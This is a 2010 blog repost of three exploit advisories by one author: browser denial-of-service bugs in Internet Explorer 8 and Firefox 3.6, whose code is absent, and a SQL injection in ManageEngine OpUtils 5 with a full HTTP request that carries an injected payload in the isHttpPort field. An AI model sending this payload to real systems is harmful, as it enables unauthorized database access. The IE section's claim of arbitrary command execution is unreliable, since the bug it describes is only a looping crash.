Thursday, February 18, 2010

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281


for code visit above link as no script allow in blogger



=======================================================================

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact

Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any might be lost

#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

========================================================================================================================

asheesh.html
========================================================================================================================

asheesh kumar mani tripathi









========================================================================================================================




#If you have any questions, comments, or concerns, feel free to contact me.






Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

asheesh.html
========================================================================================================================


asheesh kumar mani tripathi





========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt

================================================================================

ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================

#Date-3/2/10
# code by Asheesh kumar Mani Tripathi

# AKS IT Services

# Credit by Asheesh Anaconda


#Download http://www.manageengine.com/products/oputils

#Vulnerbility
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database


========================================================================================================================

Request
========================================================================================================================

POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0



========================================================================================================================
Response
========================================================================================================================


HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583